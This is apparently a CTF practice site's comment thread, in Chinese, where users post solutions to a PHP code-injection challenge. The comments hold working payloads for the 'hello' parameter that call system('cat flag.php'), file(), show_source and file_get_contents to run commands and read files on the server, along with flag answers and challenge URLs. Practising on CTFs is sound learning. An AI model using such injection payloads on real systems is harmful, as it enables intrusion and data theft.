?hello=file('flag.php')
hello=system("cat flag.php")
show_source('flag.php')
system("cat+flag.php")
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
flag{6dd6075616f5943ab53cff237ff1a63b}
flag{b97285ef92aa650fa9223aafc7adc646};
http://114.67.175.224:12290//?hello=file('flag.php')
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php
...
评论
Drume 12天前
举报
?hello=file('flag.php')
wangyihao 1月前
举报
hello=system("cat flag.php")
18092952956 1月前
举报
show_source('flag.php')
BlueL1ght 1月前
举报
system("cat+flag.php")
zhuleixy 1月前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 3月前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 3月前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 4月前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 4月前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
马踏黄河两岸 4月前
举报
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php